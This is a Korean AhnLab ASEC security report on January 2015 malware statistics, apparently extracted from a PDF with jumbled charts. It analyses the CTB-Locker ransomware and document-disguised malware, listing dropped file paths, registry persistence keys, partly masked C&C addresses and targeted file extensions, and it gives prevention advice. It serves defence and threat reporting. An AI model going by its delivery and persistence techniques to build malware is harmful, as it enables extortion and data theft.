ASEC이 집계한 바에 따르면 2015년 1월 한달 간 탐지된 악성코드
수는 3,689만 5,683건이다. 이는 전월 2,695만 5,828건 보다 993만
9,855건 증가한 수치다. 한편 1월에 수집된 악성코드 샘플 수는 354
만 9,667건이다.
[그림 1]에서 ‘탐지 건수’란 고객이 사용 중인 V3 등 안랩의 제품이 탐
지한 악성코드의 수를 의미하며, ‘샘플 수집 수’는 안랩이 자체적으로
수집한 전체 악성코드의 샘플 수를 의미한다.
[그림 2]는 2015년 1월 한달 간 유포된 악성코드를 주요 유형별로
집계한 결과이다. 불필요한 프로그램인 PUP(Potentially Unwanted
Program)가 49.29%로 가장 높은 비중을 차지했고, 트로이목마
(Trojan) 계열의 악성코드가 29.85%, 애드웨어(Adware)가 5.06%로
그 뒤를 이었다.
2015년 1월 악성코드 유포지로 악용된 도메인은 1,917개, URL은
2만 4,254개로 집계됐다. 또한 1월의 악성 도메인 및 URL 차단 건
수는 총 810만 4,699건이다. 악성 도메인 및 URL 차단 건수는 PC
등 시스템이 악성코드 유포지로 악용된 웹사이트의 접속을 차단한
수이다.
안랩 시큐리티대응센터(ASEC)는 ASEC Report Vol.61을 통해 지난 2015년 1월의 보안 통계 및 이슈를 전했다. 1월의 주요 보안 이
슈를 살펴본다.
비트코인 요구하는 랜섬웨어 ‘CTB-로커’
ASEC, 1월 악성코드 통계 및 보안이슈 발표
[그림 1] 악성코드 추이(2014년 11월 ~ 2015년 1월)
샘플 수집 수탐지 건수
[그림 2] 2015년 1월 주요 악성코드 유형
Worm DownloaderAdwareetcTrojanPUP
5,000,000
6,000,000
10,000,000
20,000,000
30,000,000
40,000,000
1,000,000
2,000,000
3,000,000
4,000,000
01월12월11월
26,955,828
36,895,683
4,263,988
3,54
9,66
7
6,07
9,29
3
6,05
9,56
3
5.06%
12.47%
29.85%
49.29%3.16%
0.47%
30
2015년 1월 한달 간 탐지된 모바일 악성코드는 10만 8,607건으로
집계되었다.
도록 자신을 숨기지만, 랜섬웨어는 사용자 PC의 ‘가용성’을 빌미로 금
전을 취득해야 하는 만큼 사용자에게 감염 사실을 보다 자극적으로
알리려고 한다.
[그림 5]는 첨부 파일을 통해 유포되고 있는 랜섬웨어 CTB-로커의 메
일 원문이다.
첨부 파일은 압축되어 있으며 압축을 풀면 [그림 6]과 같이 파일 확장
자를 볼 수 있다. 파일의 확장자는 일반적인 실행 파일의 ‘EXE’가 아
닌 화면보호기 파일 확장자인 ‘SCR’이다. 하지만 대부분의 사용자는
윈도 탐색기 옵션 중 ‘[폴더 옵션] - [알려진 파일 형식의 파일 확장자
명 숨기기]’를 사용하는 경우가 대부분이어서 파일명인 ‘hunkered’만
표기된다. 이 때문에 사용자는 별다른 의심 없이 파일을 실행한다.
hunkered.scr 파일을 실행하면 문서 파일이 사용자에게 보인다.
실행된 파일은 단순한 문서 파일이지만 파일 실행과 동시에 또 다른
악성 파일을 생성하며, 외부 네트워크에 연결을 시도한다.
비트코인 결제 유도하는 랜섬웨어 ‘CTB-로커’
최근 CTB-로커(Curve-Tor-Bitcoin Locker)가 국내에 급속히 증가함
에 따라 랜섬웨어(Ransomware)에 대한 관심이 높아지고 있다. 랜섬
웨어는 2005년 신종 보안 위협으로 처음 보도되면서 국내에 알려졌
다. 당시 랜섬웨어는 러시아와 동유럽 국가에 한정되어 있었다.
하지만 인터넷이 발전하고 유포 방식이 다양해지면서 랜섬웨어의 위
협은 전 세계로 퍼져나가고 있다. 다양한 방법을 통해 불특정 다수를
대상으로 한다는 점, 감염 PC의 데이터 복구를 위해 대가를 지불하는
피해자가 많다는 점 때문에 악성코드 제작자는 랜섬웨어를 수익 모
델로 삼는 경우가 많다. 수년 간 공격 수법도 진화를 거듭하여 꾸준히
새로운 변종이 등장하고 있어 사용자의 각별한 주의가 요구된다.
일반적인 악성코드는 사용자가 감염되었다는 사실을 인지하지 못하
악성 도메인/URL 차단 건수 악성코드 유포 URL 수악성코드 유포 도메인 수
[그림 3] 악성코드 유포 도메인/uRL 탐지 및 차단 건수(2014년 11월 ~ 2015년 1월)
[그림 4] 모바일 악성코드 추이(2014년 11월 ~ 2015년 1월)
10,000
20,000
30,000
8,000,000
9,000,000
40,000
7,000,000
6,000,000
5,000,000
4,000,000
001월
24,254
11,6126,018
1,9171,460946
12월11월
6,330,313
8,104,699
6,420,752
50,000
100,000
150,000
250,000
200,000
0
01월12월11월
108,607
149,806
98,555
[그림 5] 랜섬웨어 CTB-로커의 메일 원문
[그림 6] 확장자가 보이지 않는 상태(좌) / 확장자가 보이는 상태(우)
[그림 7] 문서의 내용
[표 1] 생성되는 파일
[생성되는 파일]
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hunkered.rtf
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\12200593.exe (랜덤 파일명)
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\qgkhcub.exe
31
[표 2] 외부 네트워크 연결
[표 3] 암호화 대상 파일 확장자
[외부 네트워크 연결]
157.56.96.56:80 → windowsupdate.microsoft.com
2**.1**.3*.1**:443
1**.9*.*.7:443
2**.1**.3*.1*:443
2**.1**.3*.3:443
46.19.37.108:80 → ip.telize.com
1**.*5.3*.5:443
1**.15*.1**.7*:443
7*.*3.*7.*4:9090
1*.*9.*6.*2:443
1*.*1.*6.*6:443
1*.1*.1*.*2:443
8*.*9.**.*8:443
[암호화 대상 파일 확장자]
.AI, .C, .CDR, .CER, .CRT, .DBF, .DER, .DOC, .DOCM, .DOCX, .EPS, .JPEG, .JPG, .JS,
.MDB, .P12, .PAS, .PDF, .PFX, .PHP, .PL, .PPT, .PPTX, .PST, .PY, .RTF, .SQL, .TXT,
.XLK, .XLS, .XLSM, .XLSX, etc
네트워크 연결을 시도하는 IP 중 일부는 토르(Tor) 네트워크로 접속을
시도한다. 이는 토르 네트워크 특성 상 추적이 힘든 점을 이용한 것으
로, 공격자가 사용자의 정보 수집 시 이용하는 것으로 추정된다.
생성된 파일 ‘12200593.exe(랜덤 파일명)’와 ‘qgkhcub.exe’는 같은
파일이다. qgkhcub.exe는 시스템의 파일을 암호화한다. qgkhcub.
exe가 실행되면 [그림 8]과 같이 사용자에게 파일이 암호화된 사실과
복호화 방법을 바탕화면에 경고 팝업창을 통해 알린다.
암호화 대상 파일 확장자에는 ‘공인 인증서 관련 파일, 그림 파일, 문
서 파일, 아웃룩 데이터 백업 파일’ 등 대부분 자주 사용하는 것들이
다. 랜섬웨어에 감염되면 파일이 암호화되어 불편하다.
또한, 이전의 랜섬웨어와 동일하게 사용자에게 테스트로 암호화된 파
일을 복호화하는 기능을 제공하며 이를 대가로 사용자에게 결제를 유
도한다.
[그림 11]과 같이 암호화되는 파일들은 확장자 뒤에 랜덤문자열로 구
성된 문자가 추가된다.
이후 파일 복호화를 진행하면 [그림 12]와 같이 비트코인 결제 방법
을 안내한다. 하지만 결제를 하더라도 파일 복구가 될 가능성은 낮다.
랜섬웨어는 AES 256, RSA 1024, RSA 2048 등 다양한 암호화 알고
리즘을 사용한다. 이러한 암호화 알고리즘을 깨기 위한 시간은 수백
년, 길게는 수천 년 이상 걸리기 때문에 파일이 암호화되면 키 없이
복호화는 거의 불가능하다.
따라서 감염된 파일을 되돌릴 수 없다면 감염을 예방하는 방법이 최
우선이다. 유입을 사전에 차단하면 좋겠지만 지금도 수많은 변종 랜
섬웨어가 유포되고 있어 백신에만 의존하기는 어렵다.
그렇다면 악성코드의 유입을 막을 수 없고 암호화된 파일을 복원할
수 없다면 어떻게 해야 할까?
원본을 수정하는 랜섬웨어는 파일을 읽어온 후 암호화 알고리즘을 통
해 데이터를 수정한다. 파일 수정을 하지 못하도록 막으면 위협에서
벗어날 수 있다. 윈도에서는 클릭 몇 번 만으로 파일의 속성을 변경할
악성코드는 확장자 파일을 모두 암호화시키며, 암호화하는 파일 확장
자는 [표 3]과 같다.
[그림 8] 변경된 바탕화면
[그림 10] 사용자의 결제를 유도하는 메시지
[그림 11] 암호화되어 확장자가 변경된 파일
[그림 12] 비트코인 결제 방법 안내
[그림 9] 사용자에게 띄워주는 경고 팝업창
32
수 있다. 중요 파일을 읽기전용으로 변경하면 랜섬웨어에 의한 감염
을 예방할 수 있다.
이지만, 사용자 몰래 악성코드를 심을 수 있는 위험한 기능이 될 수도
있다.
윈도7 이상의 운영체제를 사용하고 있다면, 윈도에서 기본적으로 제
공하는 백업 및 복원기능을 이용하여 파일, 폴더, 드라이브 단위로 중
요 데이터를 저장할 수 있다. 백업한 파일은 윈도가 설치되어 있는 로
컬 드라이브 외에 다른 드라이브나 외부저장장치에 저장하는 것이 안
전하다.
V3 제품에서는 관련 악성코드를 다음과 같이 진단 가능하다.
<V3 제품군의 진단명>
Trojan/Win32.Agent (2015.01.20.04)
Trojan/Win32.CTBLocker (2015.01.21.04)
Trojan/Win32.Ransom (2015.01.20.04)
문서 파일의 매크로 기능 악용 및 문서 아이콘으로 위장한 악성
코드
일반인들에게 PE(Portable Executable) 파일은 생소하다. 실행 파일
이라는 개념보다는 확장자가 ‘EXE’인 파일에 더 익숙하다. 또 정보가
넘쳐나는 사이트, 블로그, 게시판 또는 메일 내 첨부된 다수의 실행
파일들이 안전하지 않다는 것은 다 아는 사실이다. 하지만 대부분의
인터넷 사용자들은 문서 파일(PDF, DOC, HWP 등)에 대한 보안 의식
이 매우 약하다.
흔히 APT(Advanced Persistent Threat) 공격으로 불리는 지능화
된 악성코드의 표적 공격에 문서 파일이 자주 사용된다. 주의만 하면
APT 공격으로부터 안전할 것이라는 방심은 금물이다. 그 누구라도
사회공학적 기법을 이용한 악성코드 공격의 피해자가 될 수 있다는
사실을 인지하고 주의하는 것이 중요하다.
[그림 13] 읽기전용으로 변경하여 감염되지 않은 파일 [그림 15] 매크로 기능 On 유도
[그림 16] doc 파일에 삽입된 매크로 코드
[그림 17] adobeacd-updatexp.vbs 파일 정보
[그림 14] 읽기전용으로 변경하여 감염되지 않은 파일
[그림 14]는 최근 접수된 악의적인 매크로 기능이 추가된 MS 워드
(.doc) 파일이다. 매크로는 문서 작업의 효율을 높여주는 유용한 기능
[그림 15]와 같이 MS 워드(doc) 문서를 실행하면 문서 상단 바에 매
크로 기능 OFF 알림 메시지가 나타나며, 매크로가 자동으로 동작하
지 않도록 차단된다. 참고로 매크로 기능은 보안 상의 문제로 기본 설
정 값이 OFF로 되어 있다.
사용자 입장에서 매크로 기능이 차단됐다는 보안 경고 알림 메시지
를 본다면 해당 문서 파일을 닫을 것이다. 하지만 공격자는 매우 지능
적으로 “본 문서는 보안상 모자이크 처리됐으며, 문서 상단의 옵션을
클릭하여 활성화 바람”이라는 본문 내용과 함께 이미지를 흐리게 처
리했다. 아무리 보안 의식이 높은 사용자라도 호기심이 생길 수 있다.
해당 문서의 매크로 기능을 활성화하면 ‘C:\Windows\Temp’ 경
로에 ‘adobeacd-update.bat’와 ‘adobeacd-updatexp.vbs’ 파일을
생성하며, 배치(batch) 파일에 의해 ‘adobeacd-updatexp.vbs’ 파일
이 실행된 후 자가 삭제된다.
33
배치 파일에 의해 실행된 adobecad-updatexp.vbs는 C&C 서
버로부터 x.exe 파일이 추가로 다운 및 실행된다. 이후 x.exe는
C:\Documents and Settings\[사용자계정]\Local Settings\
Temp\msgss.exe’ 경로로 자가 복제한다.
또한 HKCU\Software\Microsoft\Windows\CurrentVersion\
Outlook’ 레지스트리 키 값을 등록하여 시스템 시작 시 자동 실행된다.
이후 x.exe 파일은 사용 중인 프로그램 정보와 사용자가 입력하는 키
값을 일정 시간마다 C&C 서버(1**.2*3.2**.2*9)로 전송한다. 위의 악
성코드는 매크로 기능을 이용했지만 그 외에도 HWP, PDF, DOC 문
서 취약점을 이용한 공격과 단순히 문서 아이콘을 도용한 악성코드
또한 지속적으로 발견되고 있다. 문서 아이콘을 도용할 때는 파일의
확장명 숨김 속성을 악용하여 사용자를 속이는 방법을 이용한다. 최근
에는 엑셀 문서 아이콘을 도용하여 국가전략연구회 정책 위원 명단으
로 위장한 악성코드가 발견되었다.
conhost.exe는 dfea.exe 파일을 생성한 후 실행하며, dfea.exe는 시
스템이 시작할 때마다 자동 실행되도록 시작프로그램에 등록한다.
[그림 19]와 같이 ‘알려진 파일 형식의 파일 확장명 숨기기’ 폴더 옵션
이 적용된 경우 엑셀 파일처럼 보일 수 있으나 실제 확장명은 exe로,
엑셀 아이콘을 위장한 실행 파일이다.
해당 파일은 내부에 엑셀 파일을 포함하고 있으며, 파일을 실행하면
엑셀 파일 ‘2015 정책위원.xlsx’와 ‘conhost.exe’를 동시에 생성한 후
실행한다. 이후 생성된 엑셀 파일을 자동으로 실행하고, 윈도 실행 명
령을 통해 처음 실행된 파일 ‘2015 정책 위원[1].xlsx.exe’를 삭제하기
때문에 사용자는 악성코드 감염 여부를 알기 어렵다.
테스트 당시 네트워크 연결은 되지 않았으나, 아래 C&C로 접속을 시
도할 것으로 추정된다.
점점 더 지능화되는 악성코드로부터 피해를 최소화하려면 보안수칙을
잘 지키는 것이 중요하다. 또한 발신이 불분명한 메일 내 첨부 파일을
단순 호기심으로라도 실행시키지 않는 주의가 필요하다.
V3 제품에서는 관련 악성코드를 다음과 같이 진단 가능하다.
<V3 제품군의 진단명>
Dropper/Win32.Agent (2015.01.20.04)
DOC/Downloader (2014.12.27.00)
Trojan/Win32.Backdoor (2015.01.24.02)
[그림 18] 사용자가 입력한 키 값을 C&C 서버로 전송
[그림 19] 알려진 파일 형식의 파일 확장명 숨기기 해제
[그림 20] ‘2015 정책 위원[1] .xlsx.exe’에 포함된 엑셀 파일의 일부분
[그림 21] 악성코드와 동시에 실행되는 ‘2015 정책위원.xlsx’ 문서 파일
[표 4] 생성되는 악성파일1
[표 5] 생성되는 악성파일2
[표 6] 추가되는 레지스트리 값
[표 7] C&C서버 주소
[생성되는 악성파일 1]
C:\Documents and Settings Administrator\Local Settings\Temp\conhost.exe
(악성 파일이 실행된 폴더 경로)\2015 정책위원.xlsx
[생성되는 악성파일2]
C:\WINDOWS\tasks\dfea.exe
[추가되는 레지스트리 값]
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dfea
→ "C:\WINDOWS\tasks\dfea.exe”
[C&C서버 주소]
h***ing.m**nc.com
http://www.fa****ok.com/******File/***e/x/o0.asp
발행인 : 권치중
발행처 : 주식회사 안랩
경기도 성남시 분당구 판교역로 220
T. 031-722-8000 F. 031-722-8901
편집인 : 안랩 콘텐츠기획팀
디자인 : 안랩 UX디자인팀
© 2015 AhnLab, Inc. All rights reserved.
본 간행물의 어떤 부분도 안랩의 서면 동의 없이 복제, 복사, 검색 시스템
으로 저장 또는 전송될 수 없습니다. 안랩, 안랩 로고는 안랩의 등록상표입
니다. 그 외 다른 제품 또는 회사 이름은 해당 소유자의 상표 또는 등록상
표일 수 있습니다. 본 문서에 수록된 정보는 고지없이 변경될 수 있습니다.
경기도 성남시 분당구 판교역로 220
T. 031-722-8000 F. 031-722-8901
© 2015 AhnLab, Inc. All rights reserved.
http://www.ahnlab.com
http://blog.ahnlab.com
http://twitter.com/ahnlab_man
